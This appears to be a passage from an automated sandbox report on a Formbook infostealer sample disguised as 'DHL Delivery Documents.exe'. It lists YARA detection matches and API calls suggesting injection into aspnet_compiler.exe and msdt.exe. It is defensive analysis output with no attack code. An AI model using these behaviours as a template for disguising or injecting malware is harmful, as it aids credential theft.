          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeCode function: 2_2_00007FFC081C3C372_2_00007FFC081C3C37
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004010277_2_00401027
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C1307_2_0041C130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C2357_2_0041C235
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C3677_2_0041C367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00408C907_2_00408C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402D887_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041A6DA7_2_0041A6DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041CF307_2_0041CF30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FF9007_2_013FF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014141207_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF7_2_014199BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B10027_2_014B1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014CE8247_2_014CE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A8307_2_0141A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C28EC7_2_014C28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B0907_2_0140B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A07_2_014220A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C20A87_2_014C20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AB407_2_0141AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0149CB4F7_2_0149CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A3097_2_0141A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2B287_2_014C2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B03DA7_2_014B03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BDBD27_2_014BDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142ABD87_2_0142ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A23E37_2_014A23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142138B7_2_0142138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142EBB07_2_0142EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFA2B7_2_014AFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B2367_2_0141B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF7_2_014B4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C22AE7_2_014C22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1D557_2_014C1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F0D207_2_013F0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2D077_2_014C2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C25DD7_2_014C25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140D5E07_2_0140D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014225817_2_01422581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D827_2_014B2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BD4667_2_014BD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B4777_2_0141B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140841F7_2_0140841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B44967_2_014B4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014CDFCE7_2_014CDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1FF17_2_014C1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BD6167_2_014BD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01416E307_2_01416E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2EF77_2_014C2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05541D5512_2_05541D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542D0712_2_05542D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05470D2012_2_05470D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055425DD12_2_055425DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E012_2_0548D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A258112_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D8212_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553D46612_2_0553D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B47712_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548841F12_2_0548841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553449612_2_05534496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0554DFCE12_2_0554DFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05541FF112_2_05541FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553D61612_2_0553D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05496E3012_2_05496E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542EF712_2_05542EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0547F90012_2_0547F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549412012_2_05494120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054999BF12_2_054999BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553100212_2_05531002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0554E82412_2_0554E824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549A83012_2_0549A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055428EC12_2_055428EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548B09012_2_0548B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A20A012_2_054A20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055420A812_2_055420A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549AB4012_2_0549AB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0551CB4F12_2_0551CB4F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549A30912_2_0549A309
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542B2812_2_05542B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553DBD212_2_0553DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055303DA12_2_055303DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AABD812_2_054AABD8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055223E312_2_055223E3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A138B12_2_054A138B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AEBB012_2_054AEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0552FA2B12_2_0552FA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B23612_2_0549B236
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05534AEF12_2_05534AEF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055422AE12_2_055422AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C36712_2_0314C367
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C13012_2_0314C130
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314CF3012_2_0314CF30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132FB012_2_03132FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314A6DA12_2_0314A6DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132D9012_2_03132D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132D8812_2_03132D88
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03138C9012_2_03138C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 013FB150 appears 136 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0547B150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004185F0 NtCreateFile,7_2_004185F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004186A0 NtReadFile,7_2_004186A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00418720 NtClose,7_2_00418720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004187D0 NtAllocateVirtualMemory,7_2_004187D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004185EC NtCreateFile,7_2_004185EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041869A NtCreateFile,7_2_0041869A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041869F NtReadFile,7_2_0041869F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041871A NtClose,7_2_0041871A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004187CA NtAllocateVirtualMemory,7_2_004187CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01439910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014399A0 NtCreateSection,LdrInitializeThunk,7_2_014399A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439840 NtDelayExecution,LdrInitializeThunk,7_2_01439840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,7_2_01439860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014398F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_014398F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A50 NtCreateFile,LdrInitializeThunk,7_2_01439A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_01439A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A20 NtResumeThread,LdrInitializeThunk,7_2_01439A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439540 NtReadFile,LdrInitializeThunk,7_2_01439540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014395D0 NtClose,LdrInitializeThunk,7_2_014395D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439710 NtQueryInformationToken,LdrInitializeThunk,7_2_01439710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439FE0 NtCreateMutant,LdrInitializeThunk,7_2_01439FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439780 NtMapViewOfSection,LdrInitializeThunk,7_2_01439780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014397A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_014397A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01439660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_014396E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439950 NtQueueApcThread,7_2_01439950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014399D0 NtCreateProcessEx,7_2_014399D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143B040 NtSuspendThread,7_2_0143B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439820 NtEnumerateKey,7_2_01439820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014398A0 NtWriteVirtualMemory,7_2_014398A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439B00 NtSetValueKey,7_2_01439B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A3B0 NtGetContextThread,7_2_0143A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A10 NtQuerySection,7_2_01439A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A80 NtOpenDirectoryObject,7_2_01439A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439560 NtWriteFile,7_2_01439560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439520 NtWaitForSingleObject,7_2_01439520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143AD30 NtSetContextThread,7_2_0143AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014395F0 NtQueryInformationFile,7_2_014395F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439760 NtOpenProcess,7_2_01439760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439770 NtSetInformationFile,7_2_01439770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A770 NtOpenThread,7_2_0143A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A710 NtOpenProcessToken,7_2_0143A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439730 NtQueryVirtualMemory,7_2_01439730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439650 NtQueryValueKey,7_2_01439650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439670 NtQueryInformationProcess,7_2_01439670
